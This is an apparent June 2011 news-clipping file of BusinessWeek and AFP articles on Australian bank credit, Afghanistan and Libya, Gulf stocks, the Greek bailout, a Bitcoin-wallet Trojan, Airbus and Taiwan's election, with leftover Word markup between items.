Commodities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Demand for commodities has helped the nation's currency gain 22 percent against the U.S. dollar in the past 12 months. It reached $1.1012 on May 2, the highest since exchange controls were scrapped in 1983, and closed at $1.0623 in New York on June 17.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prices in Australia may rise an annual 2.78 percent in the next five years, based on the gap between yields on government bonds and inflation-indexed notes.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Australia's benchmark 10-year bonds fell 6 basis points last week to 5.12 percent. Similar-maturity Treasuries fell 3 basis points to 2.94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Markit iTraxx Australia index of credit-default swaps rose 0.9 basis point last week to 115.3, the highest weekly close since September, according to data provider CMA. The gauge typically falls as investor confidence improves and rises as it deteriorates. CMA is owned by CME Group Inc. and compiles prices quoted by dealers in the privately negotiated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Bond Spreads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extra yield investors demand to hold Australian corporate bonds instead of government debt rose 3 basis points to 171 in the week ended June 17, Bank of America Merrill Lynch index data show. That compares with a 4 basis- point widening of spreads on global company debentures to 164 last week, the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banks have no investments in Greece, compared with $56.7 billion owed to French banks, according to data from the Bank for International Settlements as of the end of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government bonds held by banks in countries reporting to the BIS totaled $54.2 billion, of which 96 percent was owned by European lenders.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BNP Paribas SA, France's biggest bank, and local rivals Societe Generale SA and Credit Agricole SA may have their ratings cut by Moody's because of their investments in Greece, the risk assessor said June 15.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Downgrade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cited the Australian banks' reliance on international bond investors for the downgrade, saying markets will be "less liquid and lot more volatile" in the next five to seven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Fixed-income markets brushed off the move, the first ratings cut for the country's biggest lenders in more than a decade. Credit-default swaps on three of the four banks remained unchanged the day of Moody's announcement while contracts on Westpac rose 0.5 basis point, CMA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ratings are now in line with the lenders' AA grade from Standard &amp; Poor's. Less than 10 percent of members of the MSCI World Bank Index are ranked higher.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cost of insuring the senior debt of Australia's top four banks increased 8.3 basis points to 116.9 basis points this month, CMA prices show. Contracts on global peers rose 25.1 to 233.5 in the same period. The gap of 116.6 is the widest since March 15, Bloomberg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Bond Returns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bonds in Australian dollars have gained 0.12 percent on a price return basis this month, compared with a loss of 0.35 percent on global bank debt, Bank of America Merrill Lynch indexes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banks' balance sheets are benefiting from a surge in deposits as companies and consumers boost savings, while home buyers have also become more conservative. Borrowing for mortgages grew by 6.4 percent in April from the year-earlier period, the least since the central bank figures were first reported in 1977.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household savings ratio climbed to 11.5 percent in the three months through March from 9.7 percent in the previous quarter, the highest level since 2009, according to the statistics bureau. U.S. households saved 4.9 percent of their disposable income in April, according to the Bureau of Economic Analysis.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Nomura Holdings Inc. cut its bond sale forecast for ANZ, Westpac, National Australia Bank and Commonwealth Bank to A$89 billion for the 2011 financial year, from an earlier estimate for the period of as much as A$130 billion, according to a report published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Pimco Bet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Australia Bank priced A$2 billion of five-year floating-rate notes to yield 117 basis points more than the bank bill swap rate on June 16, Bloomberg data show. JPMorgan Chase &amp; Co. paid a 135 basis-point spread on A$600 million of five-year bonds sold in March, the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Pacific Investment Management Co.'s Australian unit holds more financial debt than the benchmark it tracks, Robert Mead, Sydney-based head of portfolio management, said in an interview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fundamental tailwinds for the Australian corporate sector and our banks, we are overweight both of those,"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Edward Johnson, Garfield Reynolds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Sarah McDonald in Sydney at smcdonald23@bloomberg.net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Shelley Smith at ssmith118@bloomberg.net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Bitcoins: Currency of the Geeks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The U.S. Postal Service Nears Collapse A Chip Industry Takes Off in China How Talbots GrewБ─"and LostБ─"Its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Credit Crunch Banking Industry European Financial Crisis Credit-Rating Agency Reform Bank for International Settlements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18:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-19/aussie-banks-seen-as-refuge-amid-greek-crisis-australia-credit.html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Taliban-U.S. Talks ‘Very Preliminary,' Defense Chief Gates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9:47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Karzai Says U.S. Holding Talks With Afghan Taliban Guerrillas Pentagon Starts Paring Troops in Afghan War as Drawdown Looms ZawahiriБ─(tm)s Appointment Shows Al-Qaeda Still a Threat, Gates Says Boehner Says Lawmakers May Seek to Deny Libya Mission Funds U.S. Puts Bahrain on List of Human Rights Abusers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Larkin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Talks between U.S. officials and Taliban guerrillas who accept Afghanistan's constitution are "very preliminary," Defense Secretary Robert Gates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State Department has been carrying out the talks on the part of the U.S. and undisclosed other countries for a few weeks, Gates said on CNN's "State of the Union" program broadcast today. Afghan President Hamid Karzai mentioned the discussions yesterday at a national youth conference in Kabul, corroborating recent reports of an Afghan peace process.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said his government isn't taking part in the talks. The Taliban militia ruled Afghanistan, harboring the al-Qaeda terrorist network, before being ousted by a U.S.-led invasion after the Sept. 11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Barack Obama has pledged to fully transfer security duties to the Afghan government by 2014, with the first troop reductions due to be announced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 say these contacts are very preliminary at this point," Gates said. "Real reconciliation talks are not likely to be able to make any substantive headway until at least this winter. I think that the Taliban have to feel themselves under military pressure, and begin to believe that they can't win before they're willing to have a serious conversation."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Gates also said that he expects a small number of U.S. troops to remain in Iraq after the end of this year to help with training and intelligence activities. He said he is worried about Iranian influence there.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truth is most of our kids who have been killed recently have been killed by extremist Shia groups," Gates told CNN. "They are clearly getting some fairly sophisticated and powerful weapons from Iran."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Clashes between two Shiite Muslim groups in Baghdad's Sadr city killed at least three people and injured five, according to a report yesterday by the Iraqi Alsumaria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clashes involved anti-U.S. cleric Moqtada al-Sadr's Mahdi Army and followers of another Shiite leader, Abu Dera'a, who has been linked with Iran, the report said. The Iraqi army lost two vehicles in an effort to control the violence, the report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by Eltaf Najafizada and Catherine Dodge and Zaid Sabah Abd Alhamid in Washington. Editors: Ann Hughey, Andrea Snyder.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Larkin in Washington at clarkin4@bloomberg.net.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God's MBAs: Why Mormon Missions Produce Leaders Want to Live Cheaply? Head to Texas Fracking: The Great Shale Gas Rush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The U.S. Postal Service Nears Collapse How Talbots GrewБ─"and LostБ─"Its Customers The World's Most Influential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Defense Industry Chief Information Officer (CIO) Gates Foundation Obama's Economic Policy China's Internet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17:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-19/taliban-u-s-talks-very-preliminary-defense-chief-gates-says.html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NATO Investigating Libyan Claims of Civilian Deaths in Tripoli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9:58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Yemeni Clerics Seek SalehБ─(tm)s Removal, Elections in 60 Days QaddafiБ─(tm)s Forces Fire Rockets at Libyan Port City of Misrata Qaddafi WonБ─(tm)t Step Down, Russian Envoy Says After Tripoli Talks Syrians Flee Second Northern Town as Army Said to Approach Boehner Says Lawmakers May Seek to Deny Libya Mission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Maher Chmaytelli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and MET for more on regional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NATO said it was investigating reports of the deaths of several civilians in an airstrike on Tripoli in Libya, shortly after confirming it had accidentally bombed a rebel column in Brega.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Libyan officials said a missile strike early today in the capital destroyed a house in the Suq al-Juma residential area, killing at least four people, the Associated Press reported. NATO said in an e-mailed statement that it was investigating the incident. Earlier it confirmed that its aircraft mistakenly hit a column of rebel military vehicles on June 16 near the Libyan oil port of Brega.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has looked into reports of an airstrike that hit opposition forces in the area of Brega and can confirm that NATO aircraft hit military vehicles," the North Atlantic Treaty Organization said in a statement on its website today. "We regret any possible loss of life or injuries caused by this unfortunate incident."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Opposition has been growing in the U.S. and Europe to the United Nations- mandated aerial campaign against Muammar Qaddafi's forces, which is intended to protect civilians. Four months after the uprising against Qaddafi began, rebel troops have failed to take and hold strategic towns such as Brega while other cities, such as the rebel-held port city of Misrata, remain under siege by loyalist forces.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Violence in the region has helped push up oil prices, with futures up 22 percent from a year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Standoff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U.S., the White House has come under pressure from politicians including House Speaker John Boehner, who accused President Barack Obama of trying to "conceal" a Justice Department opinion that the U.S. mission in Libya needs congressional authorization to continue.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Ohio Republican released a statement early yesterday after Obama declined in a letter to Boehner to address the Justice Department's Office of Legal Counsel's views on whether the War Powers Resolution of 1973 applies to the mission. The administration produced a report on June 15 saying the U.S. is serving a support role to the NATO-led mission, and is not engaged in the "hostilities" that require the backing of Congress.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may consider setting a cutoff date for its participation in the NATO mission in Libya, Defense Minister Ignazio La Russa said in an interview published yesterday by the daily Corriere della Sera. The move may "serve as a stimulus" to the U.S., France and the U.K. to find a diplomatic solution to the crisis,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Treasury Minister Danny Alexander said Britain's military operations in Libya are costing "hundreds of millions" of pounds.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campaign is costing tens of millions, potentially into the hundreds of millions, as it goes on, but that money is coming from the reserve that we have set aside precisely for contingencies such as this," Alexander said in a television interview on Sky News today. "It doesn't have an effect on any other spending."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Scott Hamilton and Mike Harrison in London, and Margaret Talev and James Rowley in Washington. Editors: Digby Lidstone, Andrew Barden.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Maher Chmaytelli in Tripoli at mchmaytelli@bloomberg.net.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Andrew J. Barden at barden@bloomberg.net.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God's MBAs: Why Mormon Missions Produce Leaders Want to Live Cheaply? Head to Texas Fracking: The Great Shale Gas Rush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Want to Live Cheaply? Head to Texas The U.S. Postal Service Nears Collapse How Talbots GrewБ─"and LostБ─"Its Customers The World's Most Influential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 of Law Indian School of Business Religion in the Workplace Future of BRIC Nations Business of Beer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17:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-19/nato-investigating-libyan-claims-of-civilian-deaths-in-tripoli.html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Abu Dhabi Shares Rise to 7-Month High on MSCI Upgrade Optimism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7:26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Abu Dhabi Commercial Rises to Highest Since 2008 on Stake Sale Saudi Shares Sink to Three-Month Low on U.S. Growth Concern Emerging Stocks Fall to 3-Month Low on Greece, Technology Tumble Emerging Stocks Fall to Three-Month Low on Europe, Rate Concern Abu Dhabi Stocks Rise to Five-Month High on ADCB, Oil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Zahra Hankir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Abu Dhabi's benchmark stock index advanced to the highest since November on speculation the United Arab Emirates will be upgraded to emerging market status by MSCI Inc. this week. Egypt's stocks increased.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Abu Dhabi Commercial Bank PJSC climbed 1.9 percent after it said it will make a profit of about 1 billion dirhams ($272 million) from the sale of its stake in RHB Capital Bhd. Emirates Telecommunications Corp., the U.A.E.'s biggest phone company, gained a 10th day, the longest winning streak since 2005. The ADX General Index climbed 0.5 percent to 2,775.44, the highest since Nov. 1, at the 2 p.m. close in Abu Dhabi. Dubai's DFM General Index fell 0.1 percent after rising 2.8 percent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MSCI, which classifies six of the seven Gulf markets as frontier, will decide on whether to raise the U.A.E. to emerging-market status on June 21. Bourses in the country said May 29 that market participants are ready to use an upgraded trading system, the so-called delivery-versus-payment, meeting one of the criteria for an upgrade at MSCI.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coming days, all investors are eyeing the MSCI decision to include the U.A.E." in the emerging market index, said Samer Darwiche, a financial analyst at Gulfmena Investments in Dubai. "All the positivity in the market is related to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Citadel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in the U.A.E. may attract $1.5 billion if the nation secures the upgrade, Sebastien Henin, who helps oversee $110 million at The National Investor in Abu Dhabi, said in April. Frontier-market is a designation that applies to economies and financial markets that are less developed. Saudi Arabia's market isn't classified at MSCI. Qatar is also under review for a reclassification this week. The nation's benchmark index gained 0.2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North Africa, Egypt's EGX30 Index advanced 0.7 percent, the most since June 14. Citadel Capital SAE climbed 5.1 percent to 6.39 Egyptian pounds, the highest since June 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Abraaj Capital Ltd., a Dubai-based private-equity firm, may hire Morgan Stanley as an adviser on the planned acquisition of a stake in the Egyptian private-equity company, two people familiar with the situation said June 16 after markets closed.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Abu Dhabi Commercial Bank added 1.9 percent to 3.29 dirhams, the highest since October 2008. The U.A.E.'s third- biggest bank by assets on June 17 agreed to sell its 24.9 percent stake in Malaysian lender RHB Capital to Abu Dhabi's state-owned Aabar Investments PJSC for 10.80 ringgit a share, or about 5.9 billion ringgit ($1.9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 Bonds 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Etisalat rose 1.4 percent, the most since Feb. 8, to 11.10 dirhams.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Bloomberg GCC 200 Index dropped 0.1 percent at 1:37 p.m. in Riyadh. Saudi Arabia's Tadawul All Share Index retreated and Bahrain's BB All Share Index dropped 0.2 percent. Oman's benchmark stock index was little changed, while Kuwait's gauge slipped 0.4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Israel's benchmark TA-25 stock index dropped 0.2 percent and the Mimshal Shiklit government bond due January 2020 fell, pushing the yield two basis points higher to 5.37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Delivery-versus-payment is a securities industry procedure in which payment for a security must be made when the security is delivered. Usually, the payment is made to a bank, which in turn pays for the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Claudia Maedler, Kim McLaughlin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Zahra Hankir in Dubai at zhankir@bloomberg.net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Claudia Maedler at cmaedler@bloomberg.net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God's MBAs: Why Mormon Missions Produce Leaders Bitcoins: Currency of the Geeks Ben Silverman, Advertainer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The U.S. Postal Service Nears Collapse Bitcoins: Currency of the Geeks A Chip Industry Takes Off in China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High Tech Electronics Marketing to Moms Higher Education Business-to-Business Marketing Green Travel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15:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-19/abu-dhabi-shares-rise-to-7-month-high-on-msci-upgrade-optimism.html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 Officials to Discuss Greek Plan That Skirts Default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7:54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 Officials Set to Discuss Greek Plan That Skirts Default Risk Merkel Heeds ECB on Greece Saying Bondholder Role Voluntary MerkelБ─(tm)s Greek Bondholder Gambit Tested as Sarkozy Visits Papandreou Greek Б─≤OdysseyБ─(tm) Challenged by Confidence Vote GreeceБ─(tm)s Papandreou Pleads With Allies to Back Austerity Effort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Tony Czuczka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comments from Papandreou starting in 21st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European finance ministers meet today to hammer out a new Greek bailout package watertight enough to avoid triggering a default that German Chancellor Angela Merkel says would be uncontrollable.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must figure out how to design a plan that will encourage investors to roll over expiring Greek debt after Merkel on June 17 ended a standoff with the European Central Bank over restructuring the country's debt load. Talks start at 6 p.m. in Luxembourg and continue tomorrow. EU leaders meet on June 23-24, where Spanish Prime Minister Jose Luis Rodriguez Zapatero expects a "political commitment" to aid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comes the tricky part," said Tullia Bucco, an economist at Unicredit Global Research in Milan. "This proposal is fraught with difficulties in identifying ways to provide banks with incentives to rollover their bonds. Any deterioration in bond conditions via new coupons below market rates would be seen by rating agencies as the trigger of a credit event."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 bonds and the euro jumped after Merkel on June 17 ended a feud with the ECB that roiled markets. Highlighting the risks still facing the euro region, Greek Prime Minister George Papandreou must win a parliamentary confidence vote this week that could delay the next austerity round, and Moody's Investors Service said on June 17 it may cut its Aa2 rating on Italy.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Lehman Experience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yesterday in Berlin that policy makers must make sure the Greek crisis doesn't infect the rest of the euro region and spark a new global financial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lived through Lehman Brothers," she told a meeting of activists from her ruling Christian Democrat party. "I don't want another such threat to emanate from Europe. We wouldn't be able to control an insolvency."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Luxembourg Prime Minister Jean-Claude Juncker, who chairs today's talks, says the ECB must agree on a new Greek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made a move that would be rejected by the ECB, by the rating agencies and therefore the financial markets, we risk setting the euro area aflame," La Libre Belgique quoted Juncker as saying in an interview published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officials have indicated that a final agreement on Greece may not come until July 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 of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is that any accord will still be classified as a form of default by rating companies, effectively cutting Greek banks off from emergency ECB funding. Fitch Ratings said on June 15 that a rollover would prompt it to cut Greece's sovereign rating to "restricted default." The bonds themselves would still avoid default and be left at "a low non-investment grade probably in the region of CCC," it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Dutch central bank Governor Nout Wellink told NRC in an interview published yesterday that banks and pension funds may lose money if they contribute on a voluntary basis to another Greek rescue.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debt is graded B+ at Fitch. Standard &amp; Poor's on June 13 cut its rating on Greece by three levels to CCC, branding it with the world's lowest debt grade.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officials have discussed incentives for investors to reinvest the proceeds of their maturing bonds into new debt, according to people familiar with the situation. They include giving investors preferred status, higher coupon payments or collateral as inducements to buy bonds replacing Greek debt maturing between 2012 and 2014,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yield on Greece's two-year bond, which topped 30 percent for the first time on June 16, fell 90 basis points to 28.79 percent the next day. The signs of flexibility from Germany sent the euro up as much as 1 percent to $1.4339.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Zapatero Prediction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Spain's Zapatero said in St. Petersburg yesterday that he expects investors to contribute voluntarily to a new Greek rescue in a "commonsense"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on June 17 she is now willing to accept that the so-called Vienna initiative of 2009, which encouraged western banks to continue funding their eastern European units, may be a model for private-investor participation in the new Greek aid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marked a reversal from the position set out by her finance minister, Wolfgang Schaeuble, who had insisted that Greek bond maturities be extended by seven years. The approach met ECB resistance and led to credit-rating company warnings that the move was tantamount to default, stalling efforts to craft an aid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ECB President Jean-Claude Trichet said today in Kiel, Germany, that a widening of global imbalances poses challenges for international policy makers. He didn't speak about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Cabinet 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will be meeting two days after Papandreou announced a Cabinet reshuffle that included replacing Finance Minister George Papaconstantinou in a bid to get rebelling allies to back the 78 billion-euro ($112 billion) austerity plan that the EU and the International Monetary Fund have made a condition for new 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named Evangelos Venizelos, his defense minister and a former rival for leadership of the ruling Socialist party, to replace Papaconstantinou. He then called for a vote of confidence in his new government that will probably be held the evening of June 21.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Papandreou said he requested the confidence vote to be able to have a stronger hand in talks with the EU. Greece is at a "critical crossroads" and its debt and deficit are a national problem that require national coordination, he said at the beginning of a three-day debate in Athens on the motion.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‘Genuine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Greece's inability to return to the markets next year for financing is an "unforeseen threat" and the government is in talks with other EU nations to find a solution for the country's funding needs, Papandreou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government has a duty to complete the talks," he told lawmakers in comments televised live on state-run Vouli TV. "It is a genuine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opposition leader Antonis Samaras, leader of New Democracy, the largest opposition party, said he won't back Papandreou in the confidence vote and demanded early elections.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is still pushing for private investors to play a "substantial" role in any new package, without specifying what that would look like.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 us try to get together a substantial contribution in this participation of private creditors," she said in Berlin yesterday. "But we don't do this on the street, we don't do this in press conferences, we do this in serious talks with those making the contribution."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estimates put Greece's 2012-14 financing gap at as much as 170 billion euros ($243 billion). It would be filled by about 45 billion euros of loans, plus 57 billion euros in unspent aid from the 2010 bailout, roughly 30 billion euros in asset-sale proceeds and about 30 billion euros from creditors.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and Marcus Bensasson in Athens and Jana Randow in Kiel, Germany. Editors: John Fraher, Dick Schumacher.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Tony Czuczka in Berlin at aczuczka@bloomberg.net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The Big Business of Synthetic Highs God's MBAs: Why Mormon Missions Produce Leaders Bitcoins: Currency of the Geeks Ben Silverman, Advertainer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The U.S. Postal Service Nears Collapse Bitcoins: Currency of the Geeks A Chip Industry Takes Off in China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Risk Management Bailout Network Neutrality Sales Performance Management Business-to-Business Marketing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15:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-19/eu-officials-to-discuss-greek-plan-that-skirts-default-risk.html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Digital pickpockets target Bitcoin virtual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Fri Jun 17, 11:51 am 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(AFP) - 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authors move fast," Symantec's Stephen Doherty said in a blog post about digital pickpockets targeting Bitcoin, which was created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seen a recent Trojan in the wild targeting Bitcoin wallets" in computers running various versions of Windows, Doherty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one motive: to locate your Bitcoin wallet.dat file and email it to the attacker," Doherty said. "This is not surprising considering the potential values in a Bitcoin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digital currency that are accepted by a few online merchants. They can be traded at online currency exchanges such as Mtgox.com for real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Doherty said Bitcoin users should consider encrypting their wallet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Bitcoins, you have the option to encrypt your wallet and we recommend that you choose a strong password for this in the event that an attacker is attempting to brute-force your wallet open,"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a Bitcoin user going by the handle of "allinvain" claimed on a public Bitcoin forum that his computer had been hacked and 25,000 Bitcoins worth $500,000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drawn the attention of members of the US Senate recently following a report that they have been used to purchase prescription drugs, cocaine, LSD and heroin at an online network called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Joe Manchin, a Democrat from West Virginia, and Senator Charles Schumer, a Democrat from New York, wrote a letter to the US Attorney General and the Drug Enforcement Agency asking for the immediate shutdown of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purchasing Bitcoins through an exchange, a user can create an account on Silk Road and start purchasing illegal drugs from individuals around the world and have them delivered to their homes within days,"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Yahoo! News on Twitter, become a fan on Facebook</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>AFP on Yahoo! News 2011.06.19 14:35</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://news.yahoo.com/s/afp/20110617/tc_afp/usitcrimecomputersecurityinternetbitcoin_20110617155152</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Airbus Delays Largest A350 Jet to Add More Powerful Engines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4:50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BransonБ─(tm)s Stiletto Gifts Make Virgin Investor Search Tough MBIA-BofA, Credit Suisse, Bayer, Microsoft in Court News French Pro-Airbus Pressure Clouds $4 Billion Vueling Order Boeing Pitches Patience in Paris as Airbus Pushes A320Neo Jet Branson Could Cut Stake to Aid Virgin Atlantic Alliance Search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Andrea Rothman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comment from Boeing executive in ninth paragraph. Hit SHOW &lt;GO&gt; for more stories on the Paris Air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Airbus SAS delayed introduction of its largest A350 wide-body aircraft by 18 months to meet demands for additional range and payload that will put the jet into more direct competition with Boeing Co's 777-300ER.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Rolls-Royce Plc, the sole engine supplier on the jet, will improve the performance of the Trent XWB engine by enlarging the core and working with more advanced technologies, the two companies said at a joint press conference yesterday in Paris. The A350-1000 aircraft, which seats about 350 people, will cost $9 million more than the previous design and come out in 2017.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Airbus aims to crack the near monopoly of Boeing's 777, which debuted in the 1990s, and the European manufacturer said its new A350-1000 will be 25 percent more fuel efficient and can carry 4.5 tons of additional weight. The change on the A350 coincides with Airbus challenging Boeing in the single-aisle market with new, more efficient engines for its A320 jet.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got feedback from customers, some quite vocal, and the message was that if we can get extra range, we should do it," Fabrice Bregier, chief operating officer of Airbus, said in an interview in Paris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Variants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A350 comes in three variants, with the mid-sized A350-900 being the most popular model, accounting for more than 60 percent of total 574 orders. Airbus maintained planned delivery of its A350-900 for the end of 2013, with Bregier saying it would be "a race against the clock." Four customers have ordered 75 A350-1000s to date, according to Airbus.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Airbus will also delay the smallest version of the A350, which seats 270 and for which it has 140 orders. That model won't change, and the extended period gives Airbus breathing space to work on the A350-900 as well as the A320neo.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changes on the largest variant include work on the landing gear and the outer part of the wing, Airbus said. The improved performance will allow the aircraft to service routes such as Shanghai to Boston or Paris to Santiago that are becoming increasingly popular, Airbus said. There will be no impact on earnings from the planned changes, the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‘Significant Investment'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Boeing is studying modifications to defend the 16-year-old 777 against Airbus. The U.S. company will monitor Airbus for production schedules before deciding whether to improve the 777 or offer an all-new variant, Jim Albaugh, its commercial airplanes chief, said earlier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company is targeting improvements to its 777 family around 2015 that would include work on the wing and engines, according to Nicole Piasecki, Boeing Commercial Airplanes' head of business development.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Airbus defines the A350-1000, we are prepared to make a much more significant investment in the 777," she told journalists during a pre-show briefing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to do more work on the Trent XWB is among the first by Rolls- Royce Chief Executive Officer John Rishton, who took over from longtime CEO John Rose in May. Rolls-Royce has been granted exclusivity on the A350-1000 variant. Rolls-Royce has gained market share in the wide-body segment, with its Trent 700 powering the A330 family of Airbus aircraft, and the Trent 900 used on the A380 double-decker.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Qatar Airways is the first and largest customer for the A350, with 80 on order. The Mideast carrier said this month that it would like to see improvements to the model. International Lease Finance Corp., the world's biggest plane leasing company by fleet value, has 20 A350s on order and has also said it favors a more powerful variant.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Susanna Ray in Seattle. Editor: Benedikt Kammel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Andrea Rothman in Paris at aerothman@bloomberg.net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Benedikt Kammel at bkammel@bloomberg.net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God's MBAs: Why Mormon Missions Produce Leaders Why Apple Isn't in the Dow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The Big Business of Synthetic Highs MBA Pay: The $3.6 Million Degree God's MBAs: Why Mormon Missions Produce Leaders Bitcoins: Currency of the Geeks Why Facebook Needs Sheryl Sandberg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The U.S. Postal Service Nears Collapse Bitcoins: Currency of the Geeks A Chip Industry Takes Off in China FireEye: Botnet Busters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Airbus Corporate Jets Search Engine Optimization Search Engines Search Engine Marketing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13:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-19/airbus-delays-largest-a350-jet-to-add-more-powerful-engines.html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Taiwan's Ma Picks Premier Wu as Presidential Running Mate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12:29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New-Home Prices Rise as Developers Hold Off Cuts Beijing May New Home Prices Rise 2.1% From Year Ago, Agency Says China Wealth Fuels Hong Kong Home Price Surges, Tsang Says Alibaba Group to Split Taobao Online Retail Unit Into Three China Urges U.S. Lawmakers to Avoid Damage Over Yuan Legislation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Tim Culpan and Janet Ong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comment from Ma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Taiwan President Ma Ying-jeou said he's chosen Premier Wu Den-yih as his running mate for his re- election bid in January against the opposition's Tsai Ing-wen.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a former mayor of southern Kaohsiung City, was appointed premier in September 2009. He replaces current vice president Vincent Siew who announced last month that he won't stay for a second term. The Jan. 14 election will pit Ma and Wu, from the ruling Kuomintang party, against the Democratic Progress Party's Tsai who has yet to announce her running mate.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60, faces declining popularity as support for his pro- China policy weakens and that of the pro-independence DPP gains. Wu has maintained his popularity as premier and may help the KMT win back support in southern Taiwan where voters favor the opposition.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 or more since he's been Premier, I've seen that he's been very good at caring for the people," Ma said. "Because he is from the grassroots and held local positions for a long time, he has a good understanding of local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63, had a job-approval rating of 38.5 percent in May, higher than Ma's 33.9 percent, according to the Global Views Monthly research centre. His disapproval rating stands at 48.2 percent, according to the May poll of 1,002 people with a margin of error of 3.1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City Mayor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Wu served as mayor of the Kaohsiung city for two terms from 1990 to 1998, and was a legislator from 2002 to 2009. He was the general secretary of the KMT from February 2007 to October 2007.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worked as a journalist after graduating from the National Taiwan University before being elected as a member of the Taipei City council at the age of 25. After serving for eight years, he returned to his home in Nantou County in central Taiwan and became the county magistrate from 1981 to 1989.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also KMT chairman, returned his party to power in 2008 after the DPP's eight years in office saw increased tensions with China, Taiwan's largest trading partner and biggest political rival. The KMT had ruled Taiwan for more than 50 years after retreating to the island following the party's defeat at the hand of Mao Zedong's communists.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Though political rivals, the KMT and Communist Party are united in their one-China policy, while local Taiwanese like Tsai have increasingly sought international recognition of its independent status. Ma's administration has signed 15 economic agreements with Beijing in a policy that Tsai has derided as "boxed in a frame set by China."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Losing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for Ma's initiatives has faded in the past two years, with 32.3 percent of respondents in the Global Views Monthly poll last month considering his Cross-Strait policy a "failure," compared with 24.2 percent in May 2009, while 49.9 percent view it as a "success," from 53.4 percent two years earlier.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Tsai, 54, who separately held posts of vice premier and Mainland Affairs Council chairwoman during Chen Shui-bian's 2000-2008 administration, has benefited from the growing discord among Taiwanese voters, according to a May survey by the TVBS Polling Center.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 would win 45 percent of votes to Tsai's 44 percent, the TVBS survey of 1,006 people conducted May 16 to 19 showed. Tsai's support surpassed Ma's among those aged 20-39, and in southern Taiwan, according to the poll which had a 3.1 percent margin of error.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2008 presidential poll, the KMT beat the DPP, winning 58 percent of the vote compared with 42 percent by pledging direct flights to China, lifting of investment restrictions by Taiwanese companies and allowing more Chinese visitors to travel to Taiwan.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regards Taiwan as part of its territory and has threatened to attack if it declares formal independence. Taiwan will hold legislative elections concurrently with the presidential poll.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Richard Dobson,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Tim Culpan in Taipei at tculpan1@bloomberg.net; Janet Ong at jong3@bloomberg.net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Why Apple Isn't in the Dow God's MBAs: Why Mormon Missions Produce Leaders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The U.S. Postal Service Nears Collapse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God's MBAs: Why Mormon Missions Produce Leaders Kindergarten at 20,000 Feet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2012 Presidential Election Japan's Internet Home-Based Business London Metal Exchange (LME) Fitness and Nutrition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08:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-19/taiwan-s-ma-picks-premier-wu-as-presidential-running-mate.html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Home Sales Probably Dropped to Year's Low: U.S. Economy Preview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2011, 12:34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Payrolls Dropped in 27 U.S. States in May, Led by California Consumer Sentiment in U.S. Declines More Than Forecast U.S. Index of Leading Economic Indicators Probably Rose in May Consumer Expectations in U.S. Decrease to Two-Year Low Housing Starts in U.S. Increased More Than Forecast in May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Timothy R. Homan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Home sales probably dropped in May to the lowest level of the year, while orders placed with factories climbed, showing housing remains a soft spot as other parts of the U.S. economy recover, economists said before reports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Purchases of new and existing houses decreased 4.8 percent to a 5.11 million annual rate last month, the weakest since November, according to the median forecast of economists surveyed by Bloomberg News. Another report may show bookings for goods made to last at least three years increased after falling in April by the most in six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jobless rate hovering around 9 percent means it will take years to absorb the 1.8 million distressed properties on the market that are weighing down home values, one reason why Federal Reserve policy makers are likely to maintain record stimulus when they meet this week. Manufacturers, on the other hand, may soon recover from the supply disruptions following the disaster in Japan and help underpin the world's largest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outlook for the housing data remains very weak, and there's been very little evidence of any turnaround," said David Semmens, a U.S. economist at Standard Chartered Bank in New York. "We've obviously seen some slowdown in manufacturing due to the supply-chain issues in Japan. That will work itself out through the second half."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 of existing homes, due from the National Association of Realtors on June 21, fell 5 percent to a 4.8 million annual pace, according to the median forecast of 55 economists surveyed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Depressed Demand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peaking at 7.08 million in 2005, the number of existing homes purchased in 2010 plunged to 